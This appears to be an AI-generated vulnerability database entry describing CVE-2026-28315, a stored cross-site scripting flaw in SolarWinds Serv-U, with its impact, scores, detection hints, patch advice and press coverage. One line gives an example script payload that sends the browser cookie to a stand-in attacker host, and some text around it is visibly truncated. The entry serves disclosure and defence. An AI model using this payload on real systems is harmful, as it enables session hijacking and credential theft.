
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-28315 is a stored cross-site scripting (XSS) vulnerability in SolarWinds Serv-U Managed File Transfer that could lead to session hijacking or information disclosure from an administrator account. It affects SolarWinds Serv-U versions 15.5.4 HF1 and below, and was publicly disclosed on July 21, 2026. The vulnerability carries a CVSS v3.1 base score of 6.2 (Medium) (SolarWinds Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. An attacker with high-privilege (administrator-level) network access can inject malicious scripts into Serv-U that are persistently stored and later executed in the browser context of another administrator who views the affected content. Exploitation requires user interaction — specifically, an administrator must be tricked into clicking a malicious link or visiting a page containing the injected payload. The scope is changed, meaning the injected script can affect resources beyond the vulnerable component itself (SolarWinds Advisory, GitHub Advisory).
Successful exploitation of this vulnerability can result in session hijacking or sensitive information disclosure from an administrator account. Because the XSS payload is stored server-side and executes in the context of an authenticated administrator's browser session, an attacker could steal session tokens, capture credentials, or perform unauthorized administrative actions on the Serv-U instance. Integrity and availability impacts are rated as none; the primary risk is high confidentiality impact within the changed scope (SolarWinds Advisory, GitHub Advisory).
As of the disclosure date, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (SolarWinds Advisory). The NVD SSVC assessment confirms exploitation is currently rated as "none." The EPSS score is approximately 0.283%, placing it in the 21st percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for high privileges and user interaction, limiting the attack surface (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script> into the vulnerable stored field.<script>, onerror=, javascript:) by a high-privilege account; repeated access to specific management console pages by different administrator accounts in a short timeframe.SolarWinds has released a fix in Serv-U version 2026.3, which addresses CVE-2026-28315 along with 14 other CVEs patched in the same release. Organizations running Serv-U 15.5.4 HF1 or below should upgrade to version 2026.3 immediately. No specific configuration-based workaround has been published; upgrading is the recommended and only confirmed remediation. Administrators should also train staff to avoid clicking suspicious links and review Content Security Policy (CSP) hardening improvements included in the 2026.3 release (SolarWinds Advisory, Serv-U Release Notes).
The July 21, 2026 Serv-U 2026.3 release attracted significant media attention primarily due to the 15 CVEs patched simultaneously, including 14 rated Critical (9.1). Coverage from GBHackers, CyberPress, Heise, and CyberSecurityNews highlighted the broader batch of critical IDOR and privilege escalation vulnerabilities rather than CVE-2026-28315 specifically, which was noted as the only Medium-severity issue in the release (GBHackers, Heise, CyberSecurityNews). No specific researcher commentary or threat actor attribution has been identified for this individual CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."